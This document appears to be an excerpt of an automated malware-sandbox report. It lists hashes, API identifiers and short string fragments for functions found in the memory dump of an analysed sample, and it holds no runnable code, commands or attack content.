                                                          • Instruction ID: 2d2eb292849ed74914c57985dfe7e563ba50c5517b571c60e4d6b76e5462cd37
                                                          • Opcode Fuzzy Hash: b29248f8861ec8d9f9602d0609553e13db4ca6b245818f8b3d2a13e52ec70524
                                                          • Instruction Fuzzy Hash: 3C61946110C3828AD7058F79849036BFFE19FA3244F1844AEE4D5AB383C77AC909C76B
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID: Wu
                                                          • API String ID: 3664257935-4083010176
                                                          • Opcode ID: 9876d0f5205f503ac3b31147c4fe603824ae2b152544d7ed90e633a4cdd92e7e
                                                          • Instruction ID: e22133d68aded2852b0909aadde07a96b9d846834dfa351e4256db85230899c3
                                                          • Opcode Fuzzy Hash: 9876d0f5205f503ac3b31147c4fe603824ae2b152544d7ed90e633a4cdd92e7e
                                                          • Instruction Fuzzy Hash: C3E1F43060C3E18BDB358F2594507BBBBE2AFA7304F48499DD4D99B282D7394505CB57
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Trst$Y{|=$Y{|=
                                                          • API String ID: 0-3553150240
                                                          • Opcode ID: e1208d81fc8c85d3d270f4aa6328560ffbfdb63ed79d86d8aed19965aa8dd395
                                                          • Instruction ID: 82f041ac4fb129b52d92bc4e0e622a48d078b5b731897c74e1898028a5a03c1e
                                                          • Opcode Fuzzy Hash: e1208d81fc8c85d3d270f4aa6328560ffbfdb63ed79d86d8aed19965aa8dd395
                                                          • Instruction Fuzzy Hash: FC314EB3B883524FD314CE6A9CC175BB6A6EBC2310F19853DDC94DB2C8C978C9098796
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: f$mlkj
                                                          • API String ID: 2994545307-4173456272
                                                          • Opcode ID: aebeac2f28ea62f0a92b7820442da45eb91bc90caa3fa21c9929503bd5f20411
                                                          • Instruction ID: 4c64b292961e85984e0260191e1ac676076537f22ceb86e998aa14a7ac434346
                                                          • Opcode Fuzzy Hash: aebeac2f28ea62f0a92b7820442da45eb91bc90caa3fa21c9929503bd5f20411
                                                          • Instruction Fuzzy Hash: E82205766093408BD718DF28C89072FB7E2EBD9304F18992EE59287391DBB89C01CB46
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K$mlkj
                                                          • API String ID: 0-1140061560
                                                          • Opcode ID: 1d6bfe0ade3e1b2936bbf3a4a242d8750284956ea84133ede389f664190fa359
                                                          • Instruction ID: 363b53c9c5521adcf3d900203d92a6946cf5d5463fdaac247f25277884d8064d
                                                          • Opcode Fuzzy Hash: 1d6bfe0ade3e1b2936bbf3a4a242d8750284956ea84133ede389f664190fa359
                                                          • Instruction Fuzzy Hash: B6B14675508340CFD3219F28C8917EBBBE1EFDA304F14896EE5C997292CB789881C74A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: F\9B$mlkj
                                                          • API String ID: 2994545307-2714594616
                                                          • Opcode ID: 3365063483bee2ac306583c2baf79b07bbbbcb7d26c5fae637048a05ab631897
                                                          • Instruction ID: be976f136087c75d3cc836e5c26e94b7e2ecf4e77cd8df77255cab527dcbf281
                                                          • Opcode Fuzzy Hash: 3365063483bee2ac306583c2baf79b07bbbbcb7d26c5fae637048a05ab631897
                                                          • Instruction Fuzzy Hash: 43716936B143009BD7188E28C8D063FB792EBD9314F19993EE9C697352CB789C01C785
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: 0?>=$@
                                                          • API String ID: 2994545307-767217726
                                                          • Opcode ID: dfbfa5e810cbc1c442dc0c28e40b056708b57764c4ead53dd122222ae65697b0
                                                          • Instruction ID: 3a77c6d0a17759d827a259e03f83c43c51df96955c699b532ce1594c11df6c84
                                                          • Opcode Fuzzy Hash: dfbfa5e810cbc1c442dc0c28e40b056708b57764c4ead53dd122222ae65697b0
                                                          • Instruction Fuzzy Hash: EF412A71A043118BD714CF24DC9236BB7E1FF89328F15952DE499A73D0E739AC05878A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$_@A
                                                          • API String ID: 0-2073229136
                                                          • Opcode ID: 4f7b69d8f459d49f217a57f0a9a55fb221073e2a755645ee80ce746e9e99b0b7
                                                          • Instruction ID: 20cebdbf30a446673fd44ee1294e223774585645bfe6c1c4e55d4a684f4df4ae
                                                          • Opcode Fuzzy Hash: 4f7b69d8f459d49f217a57f0a9a55fb221073e2a755645ee80ce746e9e99b0b7
                                                          • Instruction Fuzzy Hash: FE41B3B66583518BD704DF29C45032BB7E2FFC9314F55692EE0C297390EB789906C74A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dgX`$l.ez
                                                          • API String ID: 0-4200491131
                                                          • Opcode ID: 38976c6c8fd57b5a5dff2b82f354488d86fc6c5a4443b8711867c831509930f6
                                                          • Instruction ID: 16014e50947f795ab7f1ded1fd4c39bf1763ff48be5190231d3e76ef80b60e05
                                                          • Opcode Fuzzy Hash: 38976c6c8fd57b5a5dff2b82f354488d86fc6c5a4443b8711867c831509930f6
                                                          • Instruction Fuzzy Hash: F61129B2B243104B83188F39895246BBBE6FBD4714F55AA2EF485D72D5DA34C9018B4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mlkj
                                                          • API String ID: 0-2192308396
                                                          • Opcode ID: d6f4f0f47d0673255fa7c80862eee9c0296267c3ab75495d4f089d34b48a5d4e
                                                          • Instruction ID: 4fda0442eaf16cfdb58ee7ca0d9d32f6ef43eb6d31cc4f2186888d54ac4ebee6
                                                          • Opcode Fuzzy Hash: d6f4f0f47d0673255fa7c80862eee9c0296267c3ab75495d4f089d34b48a5d4e
                                                          • Instruction Fuzzy Hash: 1BF1F0B8618200EBD7189F28EC51A7F77A2FBC7314F24453DF68157292DB389851CB9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "#d
                                                          • API String ID: 0-3839902168
                                                          • Opcode ID: 431ceed54ffb1d3f46aeeef6a6bb40c873e136908d924a7128e289b97741c2a5
                                                          • Instruction ID: 73157a7711d009bcd06f5a510306ba94cc0283347fa46c6717ba919988dfc8bc
                                                          • Opcode Fuzzy Hash: 431ceed54ffb1d3f46aeeef6a6bb40c873e136908d924a7128e289b97741c2a5
                                                          • Instruction Fuzzy Hash: CEC15872B043209BD314DF25D88266BB3E1EFE1354F59842EE88697391E37CE945C39A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: a7395462c9b40f9162520095ee9b70401cb9ea7387a0b8a66ee37d5f957aa6c6
                                                          • Instruction ID: 7d1bc372287bb8c994caa66a517cec1fc081287e66e1cf6493d1feff302a8634
                                                          • Opcode Fuzzy Hash: a7395462c9b40f9162520095ee9b70401cb9ea7387a0b8a66ee37d5f957aa6c6
                                                          • Instruction Fuzzy Hash: 9EC13872B08320AFD725CE24E49076BB7E5AF85310F58892FE89587381E738DC45C79A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ab
                                                          • API String ID: 0-2659403885
                                                          • Opcode ID: 097a1a3a8c462d721d3d44d4419dfd969d492c84c4daff575817181de5b309e7
                                                          • Instruction ID: 18a04c35ed4d055262d839cc3bc541f9bc32cc4e9ff1edb58925424a302bf1d8
                                                          • Opcode Fuzzy Hash: 097a1a3a8c462d721d3d44d4419dfd969d492c84c4daff575817181de5b309e7
                                                          • Instruction Fuzzy Hash: 77A110B55483128BC724DF28CC917ABB7F1EF81354F08991EE8859B391E738DA44C79A
                                                          APIs
                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 004266BC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID:
                                                          • API String ID: 1304948518-0
                                                          • Opcode ID: c3d77a51a5f6ac69ea97a28b7c8e6bea60132e31677e8a2b4b91c57e8b71647e
                                                          • Instruction ID: 1b8f04ddaa5814a6cbb5ade05a88a5c9b4ece9b3b63a2574100f9b476be69e6c
                                                          • Opcode Fuzzy Hash: c3d77a51a5f6ac69ea97a28b7c8e6bea60132e31677e8a2b4b91c57e8b71647e
                                                          • Instruction Fuzzy Hash: E201B1B4A1D3A48AD334CFB4A84136FBAF0FB81300F51981DD0DDEB245CA3594029B4B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: -
                                                          • API String ID: 0-2547889144
                                                          • Opcode ID: 6a03b1d3bde38c1db3f5bd674179172993d6ab1c2bf14e658b0dfc265fd588fb
                                                          • Instruction ID: 97bb20b4423c03195d9428c2b8de4988cd920e3b223c330c98d7dc07d578709b
                                                          • Opcode Fuzzy Hash: 6a03b1d3bde38c1db3f5bd674179172993d6ab1c2bf14e658b0dfc265fd588fb
                                                          • Instruction Fuzzy Hash: 1E813C72E046524BC7188D39CA5426BBBD29BC1720F19897EE8D6E73D5FD3CCC054689
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;*y
                                                          • API String ID: 0-1171459767
                                                          • Opcode ID: c05d3b309990d23b44ea14d2579969a94c6e8c974d91ccb97fd8ea8654ed1f58
                                                          • Instruction ID: d1ae164922366f481b42436806e994f6f9cb586779525998b75cff8917e7baf9
                                                          • Opcode Fuzzy Hash: c05d3b309990d23b44ea14d2579969a94c6e8c974d91ccb97fd8ea8654ed1f58
                                                          • Instruction Fuzzy Hash: 1751257194C3108BD710DF24E8512ABB7F1EF96344F14882EE8C5AB351D335EA05CB8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;*y
                                                          • API String ID: 0-1171459767
                                                          • Opcode ID: b7e6639f8d68430d2013f887c9a0e29467e1d0de2b1894ed87235bfaef55bab7
                                                          • Instruction ID: 4a8378923a10179abfdcf8d4f58d01a5422faef1167b437de3f3b72c7bfba7ef
                                                          • Opcode Fuzzy Hash: b7e6639f8d68430d2013f887c9a0e29467e1d0de2b1894ed87235bfaef55bab7
                                                          • Instruction Fuzzy Hash: 1951157194C3108BD710DF25E8512ABB7F1EF96344F14882EE8C5AB355D339EA05CB9A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #^ZH
                                                          • API String ID: 0-3451035658
                                                          • Opcode ID: efd50c707f85ec63e43ab912c9c3ac510af843228c4a8d67cece31423f7e249c
                                                          • Instruction ID: 6e53c36a4cde5bd5420cabef97eb07ffa3a372199de788684453f48dba085fa0
                                                          • Opcode Fuzzy Hash: efd50c707f85ec63e43ab912c9c3ac510af843228c4a8d67cece31423f7e249c
                                                          • Instruction Fuzzy Hash: 925168B16083048BC715CF29C8927A7BBF2EFDA314F18855DE5C24B3A1E7788846C786
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "
                                                          • API String ID: 0-123907689
                                                          • Opcode ID: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                                          • Instruction ID: 930dfd45b4fa2bec9642a4af3bcb41e6d4051c7e6577fd2267599b9fd59d8c3c
                                                          • Opcode Fuzzy Hash: b9f92e753ab11b02b4db420d9e8affd654e3e3fea257bc5cec012aafe12283da
                                                          • Instruction Fuzzy Hash: F771F532B183754BD714CE2CE48032FB7E2ABC6710F99856EE4989B391D279DC45878A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mlkj
                                                          • API String ID: 0-2192308396
                                                          • Opcode ID: bdd2853d5377ef34e8c20968da51bd23097842b2cd0ad12fa34c3e0e85bafc46
                                                          • Instruction ID: f8ae5d8343d9b1aa80c9852a5fe2960d14e2f68844d95912e96eaca9d7732302
                                                          • Opcode Fuzzy Hash: bdd2853d5377ef34e8c20968da51bd23097842b2cd0ad12fa34c3e0e85bafc46
                                                          • Instruction Fuzzy Hash: 6F4116396082009BC324CF2498916BFB3A2FB9A314F6A853DD58687252DF74E842875E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mlkj
                                                          • API String ID: 0-2192308396
                                                          • Opcode ID: a6398e2ece7ed8a6015c5fde91152c587f0ef1711e00323671c57743c533801c
                                                          • Instruction ID: 6256f8090b9ba9f9775beeb535e844044b5f4af6feefb02fc07166a1e1a94ef9
                                                          • Opcode Fuzzy Hash: a6398e2ece7ed8a6015c5fde91152c587f0ef1711e00323671c57743c533801c
                                                          • Instruction Fuzzy Hash: 293107757083E08BD7289F28986177BF7E3EFC6304F68052DC5C597252D7395801878A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: kl
                                                          • API String ID: 0-2211745248
                                                          • Opcode ID: 8eef09741816d59fef0a0aa15018137c013723f26d4b133034aec7d0f0116a43
                                                          • Instruction ID: c18b8bdec8ff84d112db47bc58101b3ccbc2a492019f1cc289826d93695c47a4
                                                          • Opcode Fuzzy Hash: 8eef09741816d59fef0a0aa15018137c013723f26d4b133034aec7d0f0116a43
                                                          • Instruction Fuzzy Hash: A541DB7821C3428BC708CF64C85167BBBE2EF86305F04896DF4969B390E7398902CB1A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID: 0?>=
                                                          • API String ID: 2994545307-3891647100
                                                          • Opcode ID: 491e2af22c404aa182339118d37bafd851c3d795977766d08b3484434e46fbd2
                                                          • Instruction ID: ab13e43bc54a80428253f27eee9ef5cca8e65680e571e1142b06ff47657a74f2
                                                          • Opcode Fuzzy Hash: 491e2af22c404aa182339118d37bafd851c3d795977766d08b3484434e46fbd2
                                                          • Instruction Fuzzy Hash: 5031F934708300ABE7109B64DCD1B3BB7E5EB8A714F24692EE685772D1D638EC11874A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: mlkj
                                                          • API String ID: 0-2192308396
                                                          • Opcode ID: 7ffbc5b011448d8b76049ad0d55a926e67812119236ecc73dedc71b742fd3438
                                                          • Instruction ID: 2a8ffe774288475bb00133809967ebd477ab4145f046e2390917428ed8cd07ca
                                                          • Opcode Fuzzy Hash: 7ffbc5b011448d8b76049ad0d55a926e67812119236ecc73dedc71b742fd3438
                                                          • Instruction Fuzzy Hash: 1A012231649214CBC70C9F20EC2453FB372FB82324F64042CE64213651D73DAE159B8D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Rf$%
                                                          • API String ID: 0-3069614662
                                                          • Opcode ID: cfe836549f02e627f3b2c11d7aa07307bad81d50d039852b202a3dd3900c5905
                                                          • Instruction ID: 79ae638c88d335b37b7fbcc31bff9f4ebf7454de2760e629d9247117e01224e7
                                                          • Opcode Fuzzy Hash: cfe836549f02e627f3b2c11d7aa07307bad81d50d039852b202a3dd3900c5905
                                                          • Instruction Fuzzy Hash: 8D11047BB299128FC310DE29DD8485AB7E3A7C9204F1A8538C9C8A7316DA70F90586C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: [`^
                                                          • API String ID: 0-1988497175
                                                          • Opcode ID: ee180b808a7f4dec641293872c88d023af803cec24664664176417d5ab8da20f
                                                          • Instruction ID: e941a6215c83bcaa0aa8c79c5d33efb549c11c324bfc375e59b352c9aad200a8
                                                          • Opcode Fuzzy Hash: ee180b808a7f4dec641293872c88d023af803cec24664664176417d5ab8da20f
                                                          • Instruction Fuzzy Hash: 94B09238A48100878288CF05F991470A238A327204F0930288416E3271C520E8508A0C
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1bff0d3a1fba5e2fdb066276e7b3ec1bdbf4ba380aa7c3bf4b6c127a601a807d
                                                          • Instruction ID: cbc344237ec0f91119d97fc87e086ffb8153f3521390e37c44962f25c05f2320
                                                          • Opcode Fuzzy Hash: 1bff0d3a1fba5e2fdb066276e7b3ec1bdbf4ba380aa7c3bf4b6c127a601a807d
                                                          • Instruction Fuzzy Hash: 2112E43AA18611CFCB04CF28E89066AB3F2FB8E315F19847DD98A97352D7349945CB85
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f29069653d1576b781a6dad65962dbb8635d68ca22303e45bf67318e77b03a49
                                                          • Instruction ID: 2c477084993a33088d37bba3f059407362ccd068a9f5619b0dce89a35010763c
                                                          • Opcode Fuzzy Hash: f29069653d1576b781a6dad65962dbb8635d68ca22303e45bf67318e77b03a49
                                                          • Instruction Fuzzy Hash: 95E1052164C3E18BD7358F2984903ABFBD2AF97300F48496ED8D99B382D7398416C767
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dea9208d1a23c046d84d2bb213fb1603c31a3af0dd8612dfb0bf0a8534fd0a12
                                                          • Instruction ID: 950baa307ef61fac1b8db86c963ccc7695260a2fe503ce085870ef768e3eb019
                                                          • Opcode Fuzzy Hash: dea9208d1a23c046d84d2bb213fb1603c31a3af0dd8612dfb0bf0a8534fd0a12
                                                          • Instruction Fuzzy Hash: 35A144B15083048BC7249F28D8926BBB3E1EFD6318F18492EE9D28B391F7789945C756
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72f6e9b40e9f7719d3893cef25ecc5d4a19804311d22bf1d2d0af2f61b9ba396
                                                          • Instruction ID: a04235477dfd1905a4e4d199bb24443ee7e97cba45d900153b2cddd32c85e83a
                                                          • Opcode Fuzzy Hash: 72f6e9b40e9f7719d3893cef25ecc5d4a19804311d22bf1d2d0af2f61b9ba396
                                                          • Instruction Fuzzy Hash: 119113769083518BC325CF24C8913E7B3A1EF95310F1A8A6ED8C65B341E779AC86C785
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e5daf988480bef6507c944e16cc69d0a76988bf7e68d426b1ec236d4bcf4a494
                                                          • Instruction ID: 1b58c5da0586d747452119d26138aba55f765d0aa29837898ddae360bc2baaf1
                                                          • Opcode Fuzzy Hash: e5daf988480bef6507c944e16cc69d0a76988bf7e68d426b1ec236d4bcf4a494
                                                          • Instruction Fuzzy Hash: 1B516C76B093104BD7149B24DC8073BF7A2DBDA714F29952EF5C55B382DE38AC02879A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b020dff436126f13a45bc76c1d90e54a1ffaf932253cade2f2c65d24420f2d45
                                                          • Instruction ID: 2548437cb788fda130431fa846b8285ec5ffb5a1cbf8007a768b5723d1372b6f
                                                          • Opcode Fuzzy Hash: b020dff436126f13a45bc76c1d90e54a1ffaf932253cade2f2c65d24420f2d45
                                                          • Instruction Fuzzy Hash: E0513576A146408FDB28CF39CCA17777BE2AF96314B09C47DD486DB396DA38E8058718
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: beaa726a5c164c45a66496a8e4e65921f43a608172d3fe0f57dda7d7f91ae491
                                                          • Instruction ID: 8ba95efc9c89ef4b5b85eab29e0d9da9418972fd80a367163851d2d11555653c
                                                          • Opcode Fuzzy Hash: beaa726a5c164c45a66496a8e4e65921f43a608172d3fe0f57dda7d7f91ae491
                                                          • Instruction Fuzzy Hash: 40519B217083618BD7298E2894E16777782DF96320F9D826EDD924B7C6D22D8C0AD35F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ab07bd7374c9644cbdaab8c64895e8949f8c4aa7d4ff5c3097d6b13f0e5c95aa
                                                          • Instruction ID: 369512d6cd64a1d2e75d4d8eea207855d8f5bf0779b2a0c03d1f4b62fe1367ff
                                                          • Opcode Fuzzy Hash: ab07bd7374c9644cbdaab8c64895e8949f8c4aa7d4ff5c3097d6b13f0e5c95aa
                                                          • Instruction Fuzzy Hash: 3A41387AB406005BD615BB629C9263F7362EFD2718F18403EE586273C3DA7CAC06C65E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1442340305.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_3vLKNycnrz.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e1b313cfdca29bf762e69fe9ba82f988d5cd95722a07fd2e3347f515b1d9d594
                                                          • Instruction ID: 9afa4ba34189d19040924469891e76fb8a19db82670bd477210c0f96206c9e3a
                                                          • Opcode Fuzzy Hash: e1b313cfdca29bf762e69fe9ba82f988d5cd95722a07fd2e3347f515b1d9d594
